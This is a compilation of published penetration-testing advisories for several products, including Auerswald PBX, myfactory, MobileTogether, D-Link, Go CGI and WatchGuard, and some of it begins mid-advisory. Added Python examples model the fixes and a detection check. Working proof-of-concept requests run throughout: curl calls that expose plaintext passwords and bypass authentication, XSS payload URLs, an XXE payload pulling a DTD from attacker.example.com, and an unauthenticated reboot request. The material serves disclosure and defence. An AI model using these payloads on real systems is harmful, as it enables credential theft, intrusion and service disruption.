$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]
{"rufnr":"123","name":"Example User",[...],
"privatPin":"12345678","privatPass":"secretpassword",
"privatToken":"y",[...], "isSubadmin":0,[...]}

This can be repeated for other user accounts, for example for the user
account with the ID shown in the listing earlier. The server returns the
plain text password for the other user account:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=&passwd=1'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]
{"rufnr":"555","name":"sub-admin other user","privatPin":"",
"privatPass":"verysecretpassword","privatToken":"zz",
[...],"isSubadmin":1,[...]}

The password can then be used to log into the PBX with the other user
account:

$ curl --anyauth --user sub-admin:verysecretpassword --include \
  https://192.168.1.2/tree
[...]
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
[...]
[{"login":2,"userId":,[...]}]

Checking the access level with the new session ID shows that the user is now
logged in with an administrative account:

$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
  https://192.168.1.2/logstatus_state
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]
{"logstatus":"Sub-Administrator"}

Workaround
==========

Disable or restrict access to the web-based management interface if
possible.

Fix
===

Upgrade to a firmware version which corrects this vulnerability.

Security Risk
=============

Attackers who have acquired access to a low-privileged user account, for
example by extracting such an account from a VoIP phone, can log into the
web-based management interface of the COMpact 5500R PBX and access clear
text passwords for other user accounts, including those with the "sub-admin"
privilege. After logging in with these newly acquired credentials, attackers
can access configuration settings and most other functions. They can then
for example create new SIP credentials and use them to call premium rate
phone lines they operate to generate revenue. They can monitor and even
redirect all incoming and outgoing phone calls and record all Ethernet data
traffic. Due to the severe and far-reaching consequences and despite the
prerequisite of having to know an existing low-privilege user account, this
vulnerability is rated as a high risk.

Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published

References
==========

[1] https://curl.se/
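Two things go wrong in the profile endpoint above: the server never checks whether the requested "tnId" belongs to the session that asks for it, and a client-controlled "passwd=1" switches off the masking of stored credentials. The following Python is an example added for this page, not Auerswald's code. It models both behaviours side by side on constructed data that mirrors the two accounts shown (the second tnId, 5678, is invented; the advisory elides the real one) and shows what an object-level authorisation check changes.

```python
from dataclasses import dataclass
from typing import Dict, Optional

MASK = "XX"  # the placeholder the device itself uses for hidden values
SECRET_FIELDS = ("privatPin", "privatPass", "privatToken")


@dataclass
class Subscriber:
    tn_id: int
    rufnr: str
    name: str
    privat_pin: str
    privat_pass: str
    privat_token: str
    is_subadmin: int = 0

    def record(self) -> Dict[str, object]:
        """The JSON document as the device returns it, secrets included."""
        return {"rufnr": self.rufnr, "name": self.name,
                "privatPin": self.privat_pin, "privatPass": self.privat_pass,
                "privatToken": self.privat_token, "isSubadmin": self.is_subadmin}


# Constructed sample data modelled on the two accounts in the advisory.
SUBSCRIBERS = {
    1234: Subscriber(1234, "123", "Example User", "12345678", "secretpassword", "y", 0),
    5678: Subscriber(5678, "555", "sub-admin other user", "", "verysecretpassword", "zz", 1),
}


def masked(record: Dict[str, object]) -> Dict[str, object]:
    return {k: (MASK if k in SECRET_FIELDS else v) for k, v in record.items()}


def profile_vulnerable(session_tn: int, tn_id: int, passwd: Optional[str]) -> Dict[str, object]:
    """Reproduces the reported behaviour: every logged-in session may ask
    for every tnId, and passwd=1 switches the masking off. The session's
    own identity (session_tn) is never consulted."""
    record = SUBSCRIBERS[tn_id].record()
    return record if passwd == "1" else masked(record)


def profile_fixed(session_tn: int, tn_id: int, passwd: Optional[str]) -> Dict[str, object]:
    """Object-level authorisation: a session may only read the subscriber it
    is logged in as, and stored credentials are never echoed back, so the
    passwd parameter has no effect at all."""
    if tn_id != session_tn:
        raise PermissionError(f"tnId {tn_id} does not belong to this session")
    return masked(SUBSCRIBERS[tn_id].record())


def fixed_denies(session_tn: int, tn_id: int) -> bool:
    """True when profile_fixed() refuses the request."""
    try:
        profile_fixed(session_tn, tn_id, "1")
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    # Low-privileged session 1234 asks for the sub-admin's record with passwd=1.
    print("vulnerable:", profile_vulnerable(1234, 5678, "1")["privatPass"])
    print("fixed, own record:", profile_fixed(1234, 1234, "1")["privatPass"])
    print("fixed, foreign record denied:", fixed_denies(1234, 5678))
```

The fixed variant removes the "reveal" switch entirely rather than gating it on a privilege level: a password the server can hand back in clear text is stored reversibly, and no user interface needs to display it.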
[FD] [RT-SA-2021-004] Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass
[...]
  }
}

The endpoint "/account" allows listing account data:

$ curl --include --path-as-is \
  'http://192.168.1.190/about/../account?action=list'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 793
Date: Mon, 30 Aug 2021 08:43:33 GMT
Server: lighttpd

{
  "DATA": {
    [...]
    "accountList0": {
      "KEY": "accountList0",
      "COUNT": 1,
      "TYPE": "DATAMODEL",
      "VALUE": {
        "0": {
          "ID": 32327,
          "PARENTID": 0,
          "PROVIDER": "ProviderName",
          "NAME": "123 Example User",
          "STATUS": 4,
          "DEFAULT": 1
        }
      },
      [...]
    },
  }
}

The ID 32327 can then be used to get details about that particular account,
including the username and password:

$ curl --include --path-as-is \
  'http://192.168.1.190/about/../account?action=get&itemID=32327'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 2026
Date: Mon, 30 Aug 2021 08:44:13 GMT
Server: lighttpd

{
  "DATA": {
    [...]
    "Benutzer": {
      "TYPE": "DATAITEM",
      "VALUE": "123",
      "KEY": "Benutzer"
    },
    "Passwort": {
      "TYPE": "DATAITEM",
      "VALUE": "secret",
      "KEY": "Passwort"
    },
    [...]
  }
}

Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to access
and use the web-based management interface as if regular login credentials
were presented. It is likely that other functionality can be accessed in the
same way, to for example change settings or activate the integrated option
for recording the Ethernet traffic.

Workaround
==========

Disable the web-based management interface if possible.

Fix
===

Upgrade to a firmware version which corrects this vulnerability.

Security Risk
=============

Inserting the prefix "/about/../" allows bypassing the authentication check
for the web-based configuration management interface. This enables
attackers to gain access to the login credentials used for authentication
at the PBX, among other data. Attackers can then authenticate at the PBX as
the respective phone and for example call premium rate phone lines they
operate to generate revenue.
They can also configure a device they control as the PBX in the phone, so
all incoming and outgoing phone calls are intercepted and can be recorded.
The device also contains a function to record all Ethernet data traffic,
which is likely affected as well. Overall, the vulnerability completely
bypasses the authentication for the web-based management interface and
therefore poses a high risk.

References
==========

[1] https://curl.se
[2] https://github.com/zaproxy/zaproxy/

Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-04 Vendor provides access to device with fixed firmware
2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-10-14 Vendor releases corrected firmware version 2.8G
2021-12-06 Advisory published
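The bypass works because the authentication check and the request dispatcher see two different paths: the check inspects the raw request target, which begins with the public prefix "/about", while the dispatcher collapses "../" afterwards and serves "/account". The following Python is an example added for this page, not the phone's firmware code, contrasting that ordering with a check that canonicalises first. The list of public prefixes and the function names are assumptions; only "/about" is taken from the advisory.

```python
import posixpath
from urllib.parse import unquote

# Paths the web server serves without a login. "/about" is the prefix named
# in the advisory; the exact list on the phone is unknown and assumed here.
PUBLIC_PREFIXES = ("/about",)


def is_public_vulnerable(request_target: str) -> bool:
    """The check the observed behaviour implies: the raw request target is
    compared against the public prefixes. "/about/../account" starts with
    "/about", so the login check is skipped, while the dispatcher that runs
    afterwards collapses ".." and serves /account."""
    path = request_target.split("?", 1)[0]
    return any(path.startswith(prefix) for prefix in PUBLIC_PREFIXES)


def canonical_path(request_target: str) -> str:
    """Turn the request target into the path the back end actually
    dispatches on: drop the query, percent-decode exactly once, then
    collapse ".", ".." and repeated slashes. Anchoring at "/" before
    normalising means ".." can never climb above the root."""
    path = unquote(request_target.split("?", 1)[0])
    if "\x00" in path:
        raise ValueError("NUL byte in request path")
    return posixpath.normpath("/" + path.lstrip("/"))


def is_public_fixed(request_target: str) -> bool:
    """Authorise on the canonical path, and match whole segments so that
    "/aboutx" is not mistaken for a child of "/about"."""
    path = canonical_path(request_target)
    return any(path == prefix or path.startswith(prefix + "/")
               for prefix in PUBLIC_PREFIXES)


if __name__ == "__main__":
    for target in ("/about", "/about/../account?action=list",
                   "/about/..%2Faccount?action=get&itemID=32327",
                   "/account?action=list"):
        print(f"{target:46} raw-prefix check: {is_public_vulnerable(target)!s:5} "
              f"canonical: {canonical_path(target):10} public: {is_public_fixed(target)}")
```

Decoding exactly once matters: the check must see the same bytes the dispatcher sees, so it neither skips the decoding step nor repeats it.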
[FD] [RT-SA-2021-001] Cross-Site Scripting in myfactory.FMS
Advisory: Cross-Site Scripting in myfactory.FMS

During a penetration test, a reflected cross-site scripting vulnerability
(XSS) was found in the myfactory.FMS login form. If a user opens an
attacker-prepared link to the application, attackers can run arbitrary
JavaScript code in the user's browser.

Details
=======

Product: myfactory.FMS
Affected Versions: <= 7.1-911
Fixed Versions: 7.1-912 and later
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: https://www.myfactory.com/myfactoryfms.aspx
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"With myfactory, you get a modern accounting application for your business.
It covers every functionality necessary for an accounting system."
(translated from German from the vendor's homepage)

More Details
============

The myfactory.FMS web application[0] allows users to log in with a username
and password. If the password is wrong, the application redirects to a URL
similar to the following:

http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=RedTeam

The application then opens a dialogue telling the user that their username
or password is wrong and uses the value of the parameter UID to prefill the
login form, resulting in the following source code:

The UID parameter gets reflected without applying any encoding to it.

A similar problem arises when the login leads to an error. This introduces a
new parameter named 'Error':

http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=RedTeam_Error

The value of the Error parameter gets appended without encoding in the
JavaScript function mOnLoad, resulting in the following code:

function mOnLoad() {
  var sParams;
  alert('Das System konnte Sie nicht anmelden.\n RedTeam_Error');
  [...]
Proof of Concept
================

The XSS in the UID parameter can be triggered with the following URL:

http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=";>alert("RedTeam+Pentesting")

alert("RedTeam Pentesting")

To demonstrate the XSS via the Error parameter, the following URL can be
used:

http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=');alert("RedTeam+Pentesting");//

This will lead to the following JavaScript embedded in the HTML website
returned by the server:

function mOnLoad() {
  var sParams;
  alert('Das System konnte Sie nicht anmelden.\n ');alert("RedTeam+Pentesting");//');
  [...]

Workaround
==========

None

Fix
===

Install version 7.1-912 or later.

Security Risk
=============

This security vulnerability allows attackers to execute arbitrary
JavaScript code in users' browsers if they access URLs prepared by
attackers. This provides many different possibilities for further attacks
against these users. The vulnerability could for example be exploited to
display a fake login to obtain credentials and consequently access a
company's accounting information. Since attackers might be able to get
access to sensitive financial data, but users have to actively open an
attacker-defined link, this vulnerability is estimated to pose a medium
risk.

Timeline
========

2021-05-07 Vulnerability identified
2021-05-27 Customer approved disclosure to vendor
2021-06-07 Vendor notified, support confirms vulnerability and implements fix. Support says vendor does not agree to a public advisory.
2021-06-10 Vendor contacts RedTeam Pentesting, reiterates that no advisory should be released. Vendor acknowledges public release after 90 days.
2021-10-04 Customer confirms update to fixed version
2021-10-13 Advisory released

References
==========

[0] https://www.myfactory.com/myfactoryfms.aspx
[FD] [RT-SA-2021-002] XML External Entity Expansion in MobileTogether Server
---
]>
&redteam;

The HTTP response contains the resolved XML entity:

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...] RedTeam Pentesting [...]

The following example shows how local files can be read from the server
system hosting the MobileTogether Server on a Windows system:

]>
&redteam;

The content of the file is shown below and formatted for better readability:

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[...]

One interesting target for attackers could be the configuration file for
the MobileTogether Server residing at the following fixed location:

C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg

For example, if the server supports HTTPS, the absolute path to the server's
certificate and private key is stored in its configuration.

Furthermore, external XML entities can be used to access third-party
websites as well as web services that are only available internally.
Together with an externally hosted XML DTD, response information can be
extracted:

http://internal.example.com">
">
http://attacker.example.com/dtd.xml">
% dtd;
]>
&redteam;

The DTD contains the following information:

In the HTTP response, the HTML markup delivered by internal.example.com is
now visible.

A further vulnerability attacks the availability of the service through XML
exponential entity expansion. This is demonstrated with the following XML
document:

]>
&redteam20;

Sending the shown XML document leads to a huge server-side resource
allocation which ultimately disrupts the availability of the MobileTogether
Server.

Workaround
==========

None known.

Fix
===

According to the vendor, upgrading to version 7.3 SP1 resolves the
vulnerability.
Security Risk
=============

Attackers in possession of an account for a MobileTogether Server with
access to at least one app are able to read files from the server system,
conduct HTTP requests to external and internal systems and can also deny
the availability of the service. Access might also be possible through
default credentials or the anonymous user.

Timeline
========

2021-06-21 Vulnerability identified
2021-06-23 Requested a security contact from vendor
2021-06-25 Security contact established with vendor
2021-07-05 Customer approved disclosure to vendor
2021-07-05 Vendor notified
2021-07-20 Vendor acknowledged vulnerability
2021-07-22 CVE ID requested
2021-07-23 CVE ID assigned
2021-07-28 Vendor released fixed version
2021-08-10 Advisory released
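All three abuses above, local file read, requests to internal hosts via an external DTD, and exponential entity expansion, depend on the parser honouring a DOCTYPE supplied by the client. The following Python is an example added for this page, not Altova's code, showing the defence that covers all of them at once: refuse any document that declares a DOCTYPE or an entity before anything is expanded. The payloads are constructed to mirror the advisory's three cases; the win.ini path and the function names are assumptions.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDNotAllowed(ValueError):
    """The document declares a DOCTYPE or an entity; untrusted input may not."""


def reject_dtd(data: str) -> None:
    """Run expat over the document with handlers that abort the moment a
    DOCTYPE or entity declaration appears. No entity is ever expanded and
    no external resource is fetched, so file disclosure, SSRF and the
    exponential-expansion payload are all stopped at the same line."""
    parser = expat.ParserCreate()

    def abort(*_args):
        raise DTDNotAllowed("DTD and entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = abort
    parser.EntityDeclHandler = abort
    parser.Parse(data, True)


def parse_untrusted(data: str) -> ET.Element:
    """Parse only after reject_dtd() has passed the document."""
    reject_dtd(data)
    return ET.fromstring(data)


def is_rejected(data: str) -> bool:
    try:
        reject_dtd(data)
    except DTDNotAllowed:
        return True
    return False


def expanded_text_length(data: str) -> int:
    """What an unguarded ET.fromstring() materialises for the same input."""
    return len(ET.fromstring(data).text or "")


# Constructed payloads modelled on the three classes of abuse above.
BENIGN = "<data>RedTeam Pentesting</data>"

# Local file read; the win.ini path is an assumed example target.
XXE_FILE = """<!DOCTYPE data [
  <!ENTITY redteam SYSTEM "file:///C:/Windows/win.ini">
]>
<data>&redteam;</data>"""

# External parameter entity pulling an attacker-hosted DTD (SSRF, exfiltration).
XXE_REMOTE_DTD = """<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml">
  %dtd;
]>
<data>&redteam;</data>"""

# Exponential expansion, kept to 10^3 copies so the comparison below is cheap.
BOMB = """<!DOCTYPE data [
  <!ENTITY a "lol">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<data>&d;</data>"""


if __name__ == "__main__":
    print("benign:", parse_untrusted(BENIGN).text)
    for name, doc in (("file", XXE_FILE), ("remote dtd", XXE_REMOTE_DTD), ("bomb", BOMB)):
        print(f"{name:11} rejected: {is_rejected(doc)}")
    print("characters an unguarded parser materialises for the bomb:", expanded_text_length(BOMB))
```

Rejecting the DTD outright is stricter than disabling external entities alone, but it is the only setting that also removes the expansion attack, and documents exchanged with an application's own clients have no legitimate need for one.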
[FD] [RT-SA-2020-005] Arbitrary File Disclosure and Server-Side Request Forgery in BigBlueButton
le from the Internet. To exploit this vulnerability, attackers need to have
access to a conference with the ability to upload presentations. While
successful exploitation of this vulnerability would pose severe consequences
for the affected BigBlueButton instance, it is only rated to pose a medium
risk due to the requirement of having presenter access.

Timeline
========

2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication, vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability, mentioned similar bug report
2020-09-25 Requested information whether "similar bug report" uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar bug report" uses the same vulnerability, whether release schedule is known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released

References
==========

[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html
[FD] [RT-SA-2020-003] FRITZ!Box DNS Rebinding Protection Bypass
020-07-08 Vendor notified
2020-07-20 Vendor provided fixed version to RedTeam Pentesting
2020-07-23 Vendor notified of another problematic IP
2020-08-06 Vendor provided fixed version to RedTeam Pentesting
2020-10-06 Vendor starts distribution of fixed version for selected devices
2020-10-19 Advisory released
[FD] [RT-SA-2020-002] Denial of Service in D-Link DSR-250N
Advisory: Denial of Service in D-Link DSR-250N

RedTeam Pentesting discovered a Denial-of-Service vulnerability in the D-Link
DSR-250N device which allows unauthenticated attackers in the same local
network to execute a CGI script which reboots the device.

Details
=======

Product: D-Link DSR-250N
Affected Versions: 3.12 and potentially later
Fixed Versions: 3.17B
Vulnerability Type: DoS
Security Risk: low
Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
Advisory Status: published
CVE: CVE-2020-26567
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567

Introduction
============

"The D-Link Wireless N Unified Service Router (DSR-250N) provides enhanced
security, functionality and performance over a traditional VPN router
without the complexity of a full firewall solution. The D-Link Wireless N
Unified Service Router is a cost-effective, high performance solution for
securing a small business network."
(from the vendor's homepage)

More Details
============

During a penetration test, the firmware for the D-Link DSR-250N router was
downloaded from D-Link's official website[1] and extracted for further
analysis. It was then confirmed that CGI scripts exist on the router that
can be directly accessed with a web browser, without any authentication. In
particular, the script "upgradeStatusReboot.cgi" executes the command to
reboot the device. Its contents are:

#!/bin/sh
echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat

Executing this script renders the device unusable for the time of the
reboot. In tests, it turned out that the device needs roughly four minutes
to complete a reboot. As a consequence, any network using the device as a
switch or router is not accessible during that time, too. In the
penetration test, the router's web interface was available directly over
the Internet.
According to the vendor, the web interface is by default disabled for the
WAN interface.

Proof of Concept
================

An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will reboot
the device:

$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi

Workaround
==========

Access to the D-Link DSR-250N's web interface should only be enabled for
administrators, for example by only allowing access from specific IP
addresses in the firewall. Access over the WAN interface should also be
disabled if it was enabled manually.

Fix
===

A preview firmware version named 3.17B which should correct the issue was
received at the end of September from the vendor. RedTeam Pentesting was not
able to verify the fix due to lack of access to a test device. However, the
formerly accessible CGI script is no longer part of the firmware.

Security Risk
=============

No authentication is needed to execute the CGI script and thereby reboot
the device. Attackers might abuse this behaviour for targeted
denial-of-service attacks against D-Link customers, since rebooting the
device interrupts access to networks relying on this device for routing or
switching purposes. However, the attack is only possible if the attacker
resides on the same network, and no further information can be gathered or
control over the device be obtained. Therefore, the vulnerability is rated
as a low risk.

Timeline
========

2020-06-29 Vulnerability identified
2020-07-03 Customer approved disclosure to vendor
2020-07-03 Requested security contact from vendor via web form
2020-07-03 Vendor replied with contact information
2020-07-07 Advisory provided to vendor
2020-09-28 Vendor provided fixed version to RedTeam Pentesting
2020-10-05 CVE ID requested
2020-10-06 CVE ID assigned
2020-10-08 Advisory released

References
==========

[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N
[FD] [RT-SA-2020-004] Inconsistent Behavior of Go's CGI and FastCGI Transport May Lead to Cross-Site Scripting
$ curl -i -o - http://localhost:8001
HTTP/1.1 200 OK
Content-Type: image/png
[...]

PNG[...]

Workaround
==========

Applications should explicitly set a Content-Type via the Header().Set()
method of the ResponseWriter interface. The relevant code from the sample
application mentioned above then looks like this:

handler := http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {
	w.Header().Set("Content-Type", "image/png")
	w.Write(image)
})

Fix
===

The CGI and FastCGI implementations of the ResponseWriter interface should
behave as documented and infer the Content-Type from the response data. This
was implemented in Go versions 1.14.8 and 1.15.1 (the patch can be found
here [7]).

Security Risk
=============

The risk of this vulnerability heavily depends on the concrete application
at hand. If it depends on the documented behavior and is accessed via CGI
or FastCGI and provides attackers a means to request data they can
influence, this may lead to a cross-site scripting vulnerability. When other
users of the same application request the attackers' data, the embedded
JavaScript code is executed and the attackers can interact with the web
application in the user's name, display arbitrary content within the user's
browser, and observe the user's interaction with the web application.
Considering the severe consequences and the requirements for exploitation
(serving via CGI/FastCGI instead of HTTP), this vulnerability is rated as a
medium risk.
Timeline
========

2020-08-07 Vulnerability identified
2020-08-10 Vendor notified
2020-08-10 Vendor acknowledges receipt of report
2020-08-14 Vendor confirms security issues
2020-08-20 Vendor announces plans for a minor release of Go
2020-09-01 Vendor releases new version of Go, issue[6] is #40928, patch[7]

References
==========

[1] https://pkg.go.dev/net/http/?tab=doc#ResponseWriter
[2] https://pkg.go.dev/net/http/httptest?tab=doc#ResponseRecorder
[3] https://mimesniff.spec.whatwg.org/
[4] https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/cgi/child.go#L196-L199
[5] https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/fcgi/child.go#L112-L114
[6] https://github.com/golang/go/issues/40928
[7] https://go-review.googlesource.com/c/go/+/252179/
[FD] [RT-SA-2020-001] Credential Disclosure in WatchGuard Fireware AD Helper Component
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component

RedTeam Pentesting discovered a credential-disclosure vulnerability in the AD
Helper component of the WatchGuard Fireware Threat Detection and Response
(TDR) service, which allows unauthenticated attackers to gain Active
Directory credentials for a Windows domain in plaintext.

Details
=======

Product: WatchGuard Fireware AD Helper Component
Affected Versions: 5.8.5.10233, < 5.8.5.10317
Fixed Versions: 5.8.5.10317
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"Threat Detection and Response (TDR) is a cloud-based subscription service
that integrates with your Firebox to minimize the consequences of data
breaches and penetrations through early detection and automated remediation
of security threats."

"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to manage
automated installation and updates of Host Sensors on your network."
(from the vendor's homepage)

More Details
============

By accessing the AD Helper's web interface, it was discovered that a call to
an API endpoint is made, which responds with plaintext credentials to all
configured domain controllers. There is no authentication needed to use the
described interface and the installation instructions at [1] contain no
indication of any way to configure access control.
Proof of Concept
================

An HTTP GET request to the path "/rest/domains/list" of the AD Helper API
returns, among other things, the plaintext credentials for all configured
Windows domain controllers:

$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
{
  "content": [
    {
      "id": 1,
      "fullyQualifiedName": "example.com",
      "logonDomain": "example.com",
      "domainControllers": "dc1.example.com",
      "username": "[DOMAIN_USER]",
      "password": "[DOMAIN_PASSWORD]",
      "uuid": "[...]",
      "servers": [
        {
          [...]
        }
      ]
    }
  ],
  "totalPages": 1,
  "totalElements": 1,
  "number": 0,
  "numberOfElements": 1
}

The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with the
following server banner:

jetty(winstone-5.8.5.10233-9.4.12.v20180830)

It is likely that other versions of the AD Helper component are vulnerable
as well.

Workaround
==========

Ensure the API of the AD Helper component is not reachable over the
network, for example by putting it behind a firewall.

Fix
===

Update to version 5.8.5.10317 or later.

Security Risk
=============

No authentication is needed to access AD Helper's web interface, and the
installation instructions at [1] state that the configured domain user
accounts must possess at least the following privileges:

* Connect to the host
* Mount the share ADMIN$
* Create a file on the host
* Execute commands on the host
* Install software on the host

Access to the "ADMIN$" share implies a user with administrative privileges.
Therefore, this vulnerability poses a high risk.
Timeline
========

2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released

References
==========

[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
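The following check is an added example for the AD Helper finding above; it is not WatchGuard code and not part of the advisory. It issues the same unauthenticated GET as the proof of concept, parses the JSON layout shown there, and reports which domain entries expose a password, recording only a SHA-256 prefix of the secret so a finding can be documented without copying the plaintext into a report. The host name, port and the SAMPLE_RESPONSE content are assumptions; the sample is constructed test data in the shape of the advisory's response.

```python
"""Detection check for the unauthenticated AD Helper domain list."""
import hashlib
import json
import urllib.request

# Constructed sample in the shape of the advisory's response (not real data).
SAMPLE_RESPONSE = json.dumps({
    "content": [
        {"id": 1, "fullyQualifiedName": "example.com", "logonDomain": "example.com",
         "domainControllers": "dc1.example.com", "username": "svc-adhelper",
         "password": "Hunter2!", "uuid": "[...]", "servers": []},
        {"id": 2, "fullyQualifiedName": "lab.example", "logonDomain": "lab.example",
         "domainControllers": "dc1.lab.example", "username": "svc-lab",
         "password": "", "uuid": "[...]", "servers": []},
    ],
    "totalPages": 1, "totalElements": 2, "number": 0, "numberOfElements": 2,
})


def fingerprint(secret):
    """Short SHA-256 prefix: proves two findings share a password without
    storing the password itself."""
    return hashlib.sha256(secret.encode("utf-8")).hexdigest()[:12]


def exposed_domain_accounts(body):
    """Parse a /rest/domains/list response and return one finding per domain
    entry that carries a non-empty password field."""
    doc = json.loads(body)
    findings = []
    for dom in doc.get("content", []):
        secret = dom.get("password") or ""
        if not secret:
            continue
        findings.append({
            "domain": dom.get("fullyQualifiedName"),
            "domain_controllers": dom.get("domainControllers"),
            "username": dom.get("username"),
            "password_fingerprint": fingerprint(secret),
        })
    return findings


def fetch_domain_list(base_url, timeout=10):
    """Unauthenticated GET against the AD Helper REST API; path and query
    string are the ones from the advisory's proof of concept."""
    url = base_url.rstrip("/") + "/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def check_host(base_url):
    """Findings for a live host, e.g. check_host('http://adhelper.example.com:8080')."""
    return exposed_domain_accounts(fetch_domain_list(base_url))


if __name__ == "__main__":
    import sys
    # With no argument the constructed sample is analysed instead of a host.
    body = fetch_domain_list(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RESPONSE
    for finding in exposed_domain_accounts(body):
        print(finding)
```

An empty finding list from a live host does not prove the fix is installed, only that no domain currently has a password configured; compare the server banner with the fixed version as well.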
[FD] [RT-SA-2019-016] IceWarp: Cross-Site Scripting in Notes
Advisory: IceWarp: Cross-Site Scripting in Notes

During a penetration test, RedTeam Pentesting discovered that the IceWarp
WebMail Server is prone to cross-site scripting attacks in notes for
objects. If attackers with access to the IceWarp system provide a
manipulated object that is displayed by users, they can run arbitrary
JavaScript code in the users' browsers.

Details
=======

Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp 12.2.1.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
